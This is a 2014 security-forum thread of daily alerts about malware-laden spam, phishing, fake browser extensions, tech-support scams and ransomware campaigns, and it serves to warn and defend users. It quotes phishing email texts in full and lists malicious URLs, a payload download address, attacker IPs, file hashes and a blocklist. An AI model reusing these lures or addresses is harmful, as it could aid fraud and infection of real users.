Aug 19 2014 - "'JPMorgan Chase & Co Daily Report – August 19, 2014' pretending to come from various names at @ jpmorgan .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... email looks like:

Screenshot: http://myonlinesecur...ust-19-2014.png

... the html attachment that comes with the email l0oks like the below and clicking the link hidden behind the Click to read message button leads to a fake Java_update.exe
> http://myonlinesecur...t-19-2014_2.png
Todays Date: Java_update.exe .. Current Virus total detections: 5/53*  
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustot...12a96/analysis/
___

Fake Evernote extension serves Ads
- https://blog.malware...advertisements/
Aug 19, 2014 - "... a Multiplug PUP that installs a -fake- Evernote browser extension. Fellow researchers can find the link to this sample on VirusTotal here*...
> https://blog.malware...8/cert_info.png
When you execute the PUP, it silently installs a web extension for the Google Chrome, Torch, and Comodo Dragon browsers. The extension takes the form of three obfuscated JavaScript files and one HTML file. The picture shows these files installed in Chrome’s extension directory on a Windows 7 PC.
> https://blog.malware...e_ext_files.png
... The extension that’s installed is called “Evernote Web,” just like the real extension from Evernote.com. When taking a look at the Chrome extensions page, we can see the extension installed there with the ID “lbfehkoinhhcknnbdgnnmjhiladcgbol,” just like the real Evernote Web extension.
> https://blog.malware...08/evernote.png
Clicking “Visit website” directs the user to the chrome webstore page for the actual Evernote Web extension. Chrome believes the real extension is installed, as verified by the Launch App button. When clicking this button with the fake extension installed, nothing happens, whereas normally the user is met with an Evernote log in screen.
> https://blog.malware...hrome_store.png
On the surface, it may seem like the pop ups and advertisements are coming from the websites themselves, but are in fact from the fake Evernote web extension.
Fortunately, removing the extension is a simple task. For Chrome users, simply visit the extensions page and click the picture of a garbage can, and you’re done. You also might want to run a free scan using your Antivirus or Anti-malware programs (like Malwarebytes Anti-Malware) to make sure there wasn’t anything -else- added while you had the extension."
https://www.virustot...3fbf4/analysis/
___

Fake Scotiabank SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
18 Aug 2014 - "Scotiabank New Instructions for International and local transfers pretending to come from Mallerlyn Bido <mallerlyn.bido@ scotiabank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    Dear Clients
    Hereby we inform you that starting next Tuesday, August 19 all instructions of local and international transfers that are sent to our institution must be completed by a transfer form specifically allocated for the purpose, which will be replacing the letter instruction tend to complete.
    This new document has been implemented to meet international requirements and simultaneously control to make their operations safer.
    We take this opportunity to inform you that the operations of International Transfers can be made &#8203;&#8203;via our internet platform banking the need to complete these types of forms.
    Annex find the forms that apply to transfers in USD and EUR as well as the form used for ACH transfers manuals with some notes to use as a guide to complete. These templates can be saved for you with your details for future use.(See attached file: Outgoing Global.doc Form) (See attached file: Outgoing JPM.doc Form) (See attached file: Form ACH..doc) ...
Best regards,
Mallerlyn Bido | Gerente Soporte al Cliente | BSC ...


18 August 2014: New Instructions for International and Local transfers.zip ( 8kb) :
Extracts to New Instructions for International and Local transfers.exe
Current Virus total detections: 3/52* . This Scotiabank New Instructions for International and local transfers is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408393889/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 19 August 2014 - 06:49 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1259 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 20 August 2014 - 05:58 AM

FYI...

Cryptolocker flogged on YouTube
- http://www.theregist...ged_on_youtube/
20 Aug 2014 - "Cryptolocker is being flogged over YouTube by vxers who have bought advertising space... researchers made the discovery while monitoring YouTube and website banners for instances where malware writers had actually purchased space to foist their wares on -unpatched- web users. The duo who will present at the upcoming Virus Bulletin 2014 conference in Seattle wrote in a paper advertisement networks was a viable way to flog virus and trojans. "We conclude that ad networks could be leveraged to aid, or even be substituted for current exploit kits," they said. Purchased ad space was a cheap and effective means of foisting browser malware allowing attackers to filter victims by language, location, and interests, VB reported. Malware contained in ads could be obfuscated and then unleashed once conditions like operating systems, browser versions and other elements were met.
> http://regmedia.co.u...19/tghfgh55.png
CryptoLocker surfaced in September distributed through Gameover ZeuS. It encrypted important files such as images and documents on compromised Windows machines before demanding that victim pay up to $500 in BitCoins within 72 hours for the private keys necessary to unlock files. CryptoLocker used AES symmetric cryptography to encrypt the files and encrypted the AES key with an RSA-2048 bit public key generated on its server side. It came as -malvertisers- were caught flinging malware over Yahoo! ad networks*...
> http://regmedia.co.u.../fghji87y6t.png
... Many excess ad spaces were flogged through affiliates which may accept advertisements without checking the authenticity of the buyer nor the code to be run. Even those that do could end up foisting malware if they failed to detect an attackers' code alterations made after the purchase in order to quietly slip in the malware. The research pair said there was very little advertising networks could do to prevent the attacks."
* http://www.theregist...hoo_ad_network/

> https://www.virusbtn...otovNavaraj.xml
___

Fake Order SPAM – PDF malware
- http://myonlinesecur...er-pdf-malware/
20 Aug 2014 - "'Order – PDF' which comes as an email with a subject of order-6539-8.20.2014.pdf ( where the number is random & the date changes daily is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails have no body content and just a subject of order-6539-8.20.2014.pdf ( the number is random ) They appear to come from a load of common first names with weird characters form the second part of the alleged senders... previous post about this type of attack:
- http://myonlinesecur...chments-emails/
Today’s version although it pretends to be a PDF file is actually a zip file that probably either use some unknown exploit to extract it or the bad actors sending today’s malware have misconfigured the botnet sending it and it won’t automatically extract at all so users will be safe...
20 August 2014: order-6539-8.20.2014.pdf (84 kb) Extracts to order 8.20.2014.exe
Current Virus total detections for pdf is : 2/50* . Current Virus total detections for the extracted .exe : 2/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408523288/

** https://www.virustot...sis/1408523722/
___

'Reveton' ransomware adds powerful password stealer
- https://www.computer...assword_stealer
Aug 20, 2014 - ""A type of malware called Reveton, which -falsely- warns users they've broken the law and demands payment of a fine, has been -upgraded- with powerful password stealing functions, according to Avast*. Reveton is in a class of nasty programs known as "ransomware," which includes the notorious Cryptolocker program that encrypts a computer's files. The FBI issued a warning about Reveton in August 2012 after its Internet Crime Complaint Center was flooded with complaints. The malware often infects computers via drive-by download when a person visits a website rigged to automatically exploit software vulnerabilities. Users are helpless after the computer is locked, with Reveton demanding a few hundred dollars as ransom payable various web-money services... The version of Reveton analyzed by Avast also has another password stealer from the Papras family of malware. It's not as effective as Pony but can disable security programs, the company wrote on its blog*. This particular sample of Reveton was pre-programmed to search a web browser's history and cookies to see if the user had visited online sites of 17 German banks... Around February 2013, an ethnic Russian man was arrested in Dubai upon request of Spanish police for allegedly coordinating Reveton campaigns, netting... US$1.3 million. Ten other people were also arrested on money laundering charges for allegedly laundering the proceeds and transferring funds to Russia, according to Trend Micro**."
* http://blog.avast.co...rously-evolved/

** http://blog.trendmic...ivity-nabbed-2/
___

Linux Trojan makes the jump to Windows
- http://www.theinquir...jump-to-windows
Aug 20 2014 - "... the original malware known as "Linux.Dnsamp" is a Distributed Denial of Service (DDoS) Trojan, which, according to the company blog*, transfers between Linux machines, altering the startup scripts, collecting and sending machine configuration data to the hackers' server and then running silently waiting for orders. Now it appears that the same hackers have ported the Trojan to run in Windows as "Trojan.Dnsamp.1"**. The Windows version gains entry to the system under the guise of a Windows Service Test called "My Test 1". It is then saved in the system folder of the infected machine under the name "vmware-vmx.exe". When triggered, just like its Linux counterpart, the Trojan sends system information back to the hackers' central server and then awaits the signal to start a DDoS attack or start downloading other malicious programs... Although the threat of malware is an everyday hazard to most computer users, to find an attack on Linux is much rarer, and to find any kind of malware that has been ported from one operating system to another is almost unheard of... Project Shield***, an initative designed to help smaller web servers fight off DDoS attacks."
* http://news.drweb.co...c=23&lng=en&p=1

** http://news.drweb.co...903&lng=en&c=14

*** https://projectshiel...hgoogle.com/en/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 20 August 2014 - 02:23 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1260 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 21 August 2014 - 08:26 AM

FYI...

Tech Support SCAMS rip big brand security software with fake warnings
- https://blog.malware...-fake-warnings/
Aug 21 2014 - "... bogus tech support. If you are looking to download one of the popular antivirus or anti-malware product on the market, watch out before you click.
> https://blog.malware...AVs-965x395.png
Lookalike pages: Fraudsters have set up -fake- download pages that look incredibly like the authentic ones... Hijacked software: Each page links to a download, which of course is -not- the actual software...
> https://blog.malware...07/software.png
The purpose of these fake programs is to trick people into thinking something is wrong with their computers:
> https://blog.malware...14/07/error.png
The fake pages are hosted here:
hzzzp ://onlineinstanthelp .com/antivirus-download.html
hzzzp ://onlineinstanthelp .com/norton-us/download.html
hzzzp ://onlineinstanthelp .com/mcafee-us/download.html
hzzzp ://onlineinstanthelp .com/avg-us/download.html
hzzzp ://onlineinstanthelp .com/malwarebytes-us/download.html
hzzzp ://onlineinstanthelp .com/winzip-us/download.html
hzzzp ://onlineinstanthelp .com/lavasoft-us/download.html
The company providing ‘support’ is: wefixbrowsers .com ... We are reporting the sites to the registrar and passing on the LogMeIn codes so that interested parties can take appropriate actions. To avoid these -fake- installers, users should always go to the company’s official website..."
(More detail at the malwarebytes URL at the top.)

wefixbrowsers .com / 23.91.123.204: https://www.virustot...04/information/

onlineinstanthelp .com / 118.139.186.35: https://www.virustot...35/information/
___

Fake HMRC SPAM - malware
- http://myonlinesecur...-onile-malware/
21 Aug 2014 - "'Helping your Business onile' pretending to come from 'HMRC Business Help and Education Emails' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:

Screenshot: http://myonlinesecur...iness-onile.png

21 August 2014  Credit_file_961529461.zip ( 50 kb)... Current Virus total detections: 1/51*
...  targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustot...sis/1408620337/
___

Fake Credit reference SPAM - word Doc malware
- http://myonlinesecur...rd-doc-malware/
21 Aug 2014 - "'RE: Credit reference file request.(108278994)' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    Dear <REDACTED>
    You have obtain a copy of your credit reference file.
    We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 .
    Lynn Buck.


21 August 2014: Credit_file_108278994.zip (52 kb): Extracts to Credit reference file.doc.scr
Current Virus total detections: 2/52*
21 August 2014: Credit_file_642094175.zip (85kb): Extracts to credit_reference_file.xls.scr
Current Virus total detections: 2/52*
This 'RE: Credit reference file request.(108278994)' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word file instead of the .scr executable file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408613742/
___

JPMorgan customers targeted in phishing campaign
- http://www.reuters.c...N0GL20R20140821
Aug 21, 2014 - "Fraudsters are targeting JPMorgan Chase & Co customers in an email "phishing" campaign that is unusual because it attempts to collect credentials for that bank and also infect PCs with a virus for stealing passwords from -other- institutions. The campaign, dubbed "Smash and Grab," was launched on Tuesday with a widely distributed email that urged recipients to click to view a secure message from JPMorgan, according to security researchers with corporate email provider Proofpoint Inc. JPMorgan, the No. 1 U.S. bank by assets, confirmed that spammers had launched a phishing campaign targeting its customers... the bank believes most of the spam was stopped by fraud filters at large Internet providers, adding that the email looked realistic because the attackers apparently used a screen grab from an authentic email sent by the bank. Users who click on a malicious link are asked to enter credentials for accessing accounts with JPMorgan. Even if they did not comply, the site attempted to automatically install the Dyre banking Trojan* on their PCs, according to Proofpoint. Dyre is a recently discovered piece of malware that seeks credentials from customers of Bank of America Corp, Citigroup Inc and the Royal Bank of Scotland Group PLC, according to email security firm Phishme."
* http://blog.malcover...ou-need-to-know

> https://www.brainyqu...infr122731.html
"Distrust and caution are the parents of security" - Ben Franklin
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 21 August 2014 - 03:23 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1261 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 22 August 2014 - 07:44 AM

FYI...

WordPress attacks exploiting XMLRPC
- http://myonlinesecur...loiting-xmlrpc/
Aug 22, 2014 - "We are experiencing Ongoing WordPress attacks exploiting XMLRPC. There appears to be a massive attack on WordPress sites today. So far I have had almost -1600- blocked attacks against ONE of my WordPress sites... Anybody using WordPress should make sure that they are plugged and use a good security system to prevent or -block- these attacks. It appears to be using the attack mentioned in this post:
> http://blog.sucuri.n...-wordpress.html
... -None- of the current wordpress security plugins will -block- this and you need to make sure that you have a strong random password on your admin account. The -only- way to block them is on the perimeter, that is use a firewall that blocks the offending IP numbers that are responsible for the attacks. They are all coming from other compromised servers or hacked users computers..."
(More detail at the URL's above.)
___

Fake ADP 'Anti-Fraud Secure Update' SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
22 Aug 2014 - "'ADP: August 22, 2014 Anti-Fraud Secure Update' pretending to come from ADP_Netsecure@ adp .com  is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Dear Valued ADP Client,
We are pleased to announce that ADP Payroll System released secure upgrades to your computer.
A new version of secure update is available.
Our development division strongly recommends you to download this software update.
It contains new features:
    The certificate will be attached to the computer of the account holder, which disables any fraud activity
    Any irregular activity on your account is detected by our safety centre
Download the attachment. Update will be automatically installed by double click.
We value our partnership with you and take pride in the confidence that you place in us to process payroll on your behalf. As always, your ADP Service Team is happy to assist with any questions you may have...


22 August 2014 : 2014 Anti-Fraud Secure Update_08222014.zip (9kb)
Extracts to   2014 Anti-Fraud Secure Update_08222014.exe
Current Virus total detections: 3/54* . This 'ADP: August 22, 2014 Anti-Fraud Secure Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408710186/

- http://threattrack.t...aud-update-spam
22 Aug 2014 - "Subjects Seen:
    ADP: August 22, 2014 Anti-Fraud Secure Update
Typical e-mail details:

Screenshot: https://gs1.wac.edge...Ga8i1r6pupn.png

Malicious File Name and MD5:
    2014 Anti-Fraud Secure Update_08222014.scr (840B3B6A714F7330706F0C19F99D5EB8)
    2014 Anti-Fraud Secure Update_08222014.zip (AB0D93E0952BDCE45D6E6494DF4D94AD)


Tagged: ADP, Upatre
___

Backoff Point-of-Sale Malware Campaign
- https://www.us-cert....alware-Campaign
August 22, 2014 - "US-CERT is aware of Backoff malware compromising a significant number of -major-  enterprise networks as well as small and medium businesses. US-CERT encourages administrators and operators of Point-of-Sale systems to review the Backoff malware alert* to help determine if your network may be affected. Organizations that believe they have been infected with Backoff are also encouraged to contact their local US Secret Service Field Office."
* https://www.us-cert....lerts/TA14-212A
Last revised: Aug 22, 2014 - "... the Secret Service currently estimates that over 1,000 U.S. businesses are affected..."

Backoff malware Q&A
- https://www.trustwav...malware-danger/
"In light of a recent string of breaches involving a new point-of-sale malware family that our Trustwave researchers identified and named "Backoff," we have received many questions about the threat and how businesses can protect themselves..."
- https://gsr.trustwav...lware-overview/
___

"FlashPack" - add-on targets Japanese users, leads To exploit kit
- http://blog.trendmic...to-exploit-kit/
Aug 21, 2014 - "... In order to affect users, this particular exploit kit does -not- rely on spammed messages or compromised websites: instead, it uses a compromised website add-on. This particular add-on is used by site owners who want to add social media sharing buttons on their sites. All the site owner would have to do is add several lines of JavaScript code to their site’s design template. This code is freely available from the website of the add-on. The added script adds an overlay like this to the site’s pages:
Added share buttons:
> http://blog.trendmic.../08/toolbar.png
To do this, a JavaScript file on the home page of the add-on is loaded. This alone should raise red flags: it means that the site owner is loading scripts from an external server -not- under their control. It’s one thing if it loads scripts on trusted sites like Google, Facebook, or other well-known names; it’s another thing to load scripts on little-known servers with no name to protect. As it turns out, this script is being used for malicious purposes. On certain sites, instead of the original add-on script, the user is redirected to the script of FlashPack... loading the s.js file directly will simply load the “correct” script for the add-on. One site which, if found in the Referer header, will trigger the exploit kit is a well-known free blogging site in Japan. The exploit kit delivers various Flash -exploits- to -targeted- users... At least approximately 58,000 users have been affected by this attack, with more than 87% of these coming from Japan. The landing pages of the exploit kit are hosted in servers in the Czech Republic, the Netherlands, and Russia.
Number of hits by country from August 1 to 17
> http://blog.trendmic...-Country-01.jpg
How can users and site owners prevent these attacks? Site owners should be very cautious about adding add-ons to their site that rely on externally hosted scripts. As shown in this attack, they are trivial to use in malicious activities. In addition, they can slow the site down as well. Alternatives that host the script on the same server as the site itself are preferable. This incident illustrates for end users the importance of keeping-software-patched. The vulnerability we mentioned above has been fixed for half-a-year. Various auto-update mechanisms exist which can keep Flash up-to-date..."
 

:ph34r: :ph34r:  :grrr:


Edited by AplusWebMaster, 22 August 2014 - 09:30 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1262 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 24 August 2014 - 05:26 AM

FYI...

My Photos SPAM - malware
- http://myonlinesecur...photos-malware/
23 Aug 2014 - "'My Photos' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Very simple email with content just saying 'Please find attached photos of my birthday party.' This one is particularly nasty and dangerous because it doesn’t give any outward signs of infection. It downloads an auto-configure script from http ://construtoralondres.zip .net/JScript32.log which then attempts to send all traffic through a proxy server http ://supermercadorleves.ddns .net which then filters out UK banking traffic to another proxy where they can steal all your banking log on and account information. Each UK bank is sent to a -different- proxy where the sites are set up to intercept traffic to the genuine UK bank site. That way, you think that you are on the genuine UK bank site and you actually are, but the proxy between you and the bank can read -everything- you type or do on the bank site. You have absolutely no idea that this is happening & you still get a padlock in the address bar to say that you are on a safe site.

23 August 2014: My Photos.zip ( 8kb): Extracts to My Photos.exe
Current Virus total detections: 10/50* . All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustot...sis/1408799346/

zip .net / 200.147.99.195: https://www.virustot...95/information/
- http://quttera.com/d..._report/zip.net
Submission date: Aug 24 16:53:51 2014
Server IP address: 200.147.99.195
"Warning: This Website Is Blacklisted!..."

ddns .net / 8.23.224.108: https://www.virustot...08/information/
- http://quttera.com/d...report/ddns.net
Submission date: Aug 24 16:46:40 2014
Server IP address: 8.23.224.108
"Alert: Suspicious Content Detected On This Website!..."
___

Sony PlayStation Network taken down by attack
- http://www.reuters.c...N0GP02620140825
Aug 24, 2014 - "Sony Corp said on Sunday its PlayStation Network was taken down by a denial of service-style attack and the FBI was investigating the diversion of a flight carrying a top Sony executive amid reports of a claim that explosives were on board. The company said in a posting on its PlayStation blog that no personal information of the network was accessed in the attack, which overwhelmed the system with heavy traffic... Sony is hoping its PlayStation network, with 52 million active users, can serve as a centerpiece of its plans to rebuild its business after years of losses in its flagship electronics operations..."

- http://www.reuters.c...N0GP02620140825
Aug 25, 2014 - "Sony Corp's PlayStation Network was back online on Monday following a cyber attack that took it down over the weekend, which coincided with a bomb scare on a commercial flight carrying a top Sony executive in the United States. Sony said on its PlayStation blog that its PlayStation network had been taken down by a denial of service-style attack, which overwhelmed the system with traffic, but did not intrude onto the network or access any of its 53 million users' information..."

> http://support.xbox....box-live-status
 

:grrr: :grrr:  :ph34r:


Edited by AplusWebMaster, 25 August 2014 - 06:27 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1263 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 25 August 2014 - 06:45 AM

FYI...

Fake Invoice SPAM - PDF Malware
- http://myonlinesecur...ke-pdf-malware/
25 Aug 2014 - "'Please find attached Invoice No.' < random number> pretending to come from portadown.372@eel .co.uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails are -not- being sent from eel .co.uk or edmundson-electrical .co.uk, As far as we can determine they have not been hacked or their website or email system compromised. The bad guys have just decided to use Edmundson Electrical Ltd as a way to persuade you to open the attachment and become infected. It is a follow on campaign from this Broadoak toiletries attack:
> http://myonlinesecur...ke-pdf-malware/
Once again this email template has several different sized malwares attached to it and it appears random which version you get... Email looks like:
    WALSALL
    MAHON RD IND EST. PORTADOWN
    CO. ARMAGH BT62 3EH
    T:028 3833 5316
    F:028 3833 8453
    Please find attached Invoice No. 3036 – 8340637
    Best
    Branch Manager
    Registered Office: PO Box 1 Knutsford Cheshire WA16 6AY ...


25 August 2014: 3036 – 8340637.zip (44kb): Extracts to Invoice 372 – 667911.exe
Current Virus total detections: 2/55*  
25 August 2014: 0463 – 485325.zip (47kb): Extracts to Invoice 829 – 991882.exe
Current Virus total detections: 2/51**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408955315/

** https://www.virustot...sis/1408955404/
___

Fake Fax SPAM - pdf malware
- http://myonlinesecur...ke-pdf-malware/
25 Aug 2014 - "'A fax has arrived from remote ID ’866-905-0884' pretnding to come from RFaxSMTP MTGm <RIGHTFAX@ mtgmfaxmail .bankofamerica .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
    A fax has arrived from remote ID ’866-905-0884′.
    ————————————————————
    Transmission Record
    Received from remote ID: ’866-905-0884′
    Inbound user ID derek, routing code 669164574
    Result: (0/352;0/0) Successful Send
    Page record: 1 – 2
    Elapsed time: 00:39 on channel 34 ...


25 August 2014: Fax_Remote_ID.zip ( 13kb) : Extracts to Fax_Remote_ID.scr
Current Virus total detections: 0/55* . This 'A fax has arrived from remote ID 866-905-0884' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408971894/
___

Bank of America Activity Alert Spam
- http://threattrack.t...vity-alert-spam
Aug 25, 2014 - "Subjects Seen:
    Bank of America Alert: A Check Exceeded Your Requested Alert Limit
Typical e-mail details:
    Activity Alert
    A check exceeded your requested alert limit
    We’re letting you know a check written from your account went over the limit you set for this alert.
    For more details please check attached file


Screenshot: https://gs1.wac.edge...Tu861r6pupn.png

Malicious File Name and MD5:
    report08252014_6897454147412.vcr (7ED898AA2A8B247F7C7A46D71B125EA8)
    report08252014_6897454147412.zip (FF4C74D80D3C7125962D7316F570A7FF)


Tagged: Bank of America, Upatre
___

Facebook Work From Home SCAM
- http://www.hoax-slay...gram-scam.shtml
Aug 25, 2014 - "Message claims that Facebook has launched a new 'Work From Home' program that will allow users to make money from the comfort of their own homes... The message is a scam. Facebook has not launched such a program and has no connection to the scheme. The link in the message takes you to a fake Facebook Page that tries to trick you into paying four dollars for a dodgy 'Facebook Millionaire' kit. Fine print on the signup form indicates that your credit card will be charged $94 per month for continued access. Do -not- be tempted to participate in this -bogus- program.
> http://www.hoax-slay...gram-scam-1.jpg
... It claims that people can potentially make thousands of dollars per month but warns that only a limited number of 'positions' are available... If this message comes your way, do -not- click any links it contains..."
___

Fake ADP SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
25 Aug 2014 - "'ADP Invoice for week ending 08/22/2014 Invoice: 447589545' pretending to come from Billing.Address.Updates@ ADP .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    Your most recent ADP invoice is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number or e-mail address provided on the invoice for assistance.
    Thank you for choosing ADP for your business solutions.
    Important: Please do not respond to this message. It is generated from an unattended mailbox.


25 August 2014: invoice_447589545.zip (10kb): Extracts top invoice_447589545.exe
Current Virus total detections: 2/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408992097/
___

BoA Merrill Lynch CashPro Spam
- http://threattrack.t...ch-cashpro-spam
Aug 25, 2014 - "Subjects Seen:
    Bank of America Merrill Lynch: Completion of request for ACH CashPro
Typical e-mail details:
    You have received a secure message from Bank of America Merrill Lynch
    Read your secure message by opening the attachment, securedoc.html. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser.
    If you have concerns about the validity of this message, contact the sender directly.
    First time users - will need to register after opening the attachment.


Malicious URLs:
    161.58.101.183/handler/jxpiinstall.exe

Malicious File Name and MD5:
    securedoc.html (D6E1DD6973F8FAA730941A19770C97F2)
    jxpiinstall.exe (C3110BFDD8536DC627336D7F7A6CC2E7)


Screenshot: https://gs1.wac.edge...RagN1r6pupn.png

Tagged: Bank of America, Merrill Lynch, tuscas

161.58.101.183: https://www.virustot...83/information/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 25 August 2014 - 06:07 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1264 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 26 August 2014 - 04:14 AM

FYI...

Fake Vodafone SPAM
- http://blog.dynamoo....lware-spam.html
26 Aug 2014 - "This -fake- Vodafone spam comes with a malicious attachment. There is not body text as such, the header reads:
    From:     Vodafone MMS service [mms813562@ vodafone .co.uk]
    Date:     26 August 2014 12:00
    Subject:     IMG Id 813562-PictQbmR TYPE--MMS


The version I had was mangled and the attachment was just called noname which required a bit of work to turn into a ZIP file IMG Id 813562-PicYbgRr TYPE--MMS.zip which in turn contains a malicious executable Picture Id 550125-PicSfdce TYPE-MMS.exe This .EXE file has a VirusTotal detection rate of 3/55*. The malware then attempts to download additional components... This second component has a VirusTotal detection rate of 3/53**... I would recommend the following blocklist:
192.254.186.106 ..."
(More detail at the dynamoo URL above.)
* https://www.virustot...sis/1409051519/

** https://www.virustot...sis/1409052175/

192.254.186.106: https://www.virustot...06/information/
___

Phishers hook Facebook Users via SMS
- https://blog.malware...-users-via-sms/
Aug 26, 2014 - "If you happen to receive an SMS message from a potentially unknown recipient with the following text—
    wtf f***** remove this pic from Facebook. http ://bit[dot]do/fbnudephotos
... much like the fellow on the screenshot:
> https://blog.malware...2014/08/SMS.png
...then you’ve been targeted by a phishing campaign. The bit .do link is the shortened URL for a publicly available HTML page hosted on a Dropbox account. It looks like this:
> https://blog.malware.../dbox-phish.png
All links but one – the 'Get Facebook for iPhone and browse faster' link – lead to a 404 page. The aforementioned link leads to the actual iTunes app download page. The full code of the page is actually hex encoded and executed by the unescape () function... Once users provide their Facebook credentials to the page, these are then posted to a .PHP page hosted on 193[dot]107[dot]17[dot]68, which we found out to be quite a popular location for hosting malware. While this happens at the background, users are directed to the following screenshot which serves as humour, if not a “Gotcha!” after a successful con:
> https://blog.malware.../08/unibrow.png
... Individuals or groups with bad intent have been using SMS as a way to -scam- people, either for their money or for their information. Senior Security Researcher Jérôme Segura have published a post entitled “SMS Scams: How To Defend Yourself”* back in 2013, which I recommend you... read as well. His thoughts on this kind of fraud remains relevant to this date..."
* https://blog.malware...efend-yourself/

193.107.17.68: https://www.virustot...68/information/
___

Vacation SCAMS ...
- https://blog.malware...-at-the-border/
Aug 26, 2014 - "... common travel scams and things to be wary of right now... First up, we have an Infographic over at the Just the flight blog which details 40 tourist scams to avoid*, along with common locations for said scams:
* http://www.justthefl...his-summer.html
... Whether you’re being driven to fake hotels by taxi drivers in on the act, looking at bogus takeaway menus slipped under your hotel door, accosted by  pretend policemen or trying to catch a fake baby (no really) thrown in your general direction by a scammer working with pickpockets... Next up, we have some advice on the South China Morning Post in relation to travelling alone**, which includes tips and advice alongside links to additional information. Well worth a look if you’re planning on upping sticks and going solo:
** http://www.scmp.com/...ingle-traveller
Finally, there’s a device which can be placed inside jewelry and perform numerous functions while on the move, including sending alert messages*** in case of emergency:
*** http://www.bust.com/...p-you-safe.html
Wherever you go, you can be sure con-jobs and fakeouts lie in wait and the sensible traveler will do a little background reading before wandering off to parts unknown. It pays to keep your wits about you whether at home or abroad..."
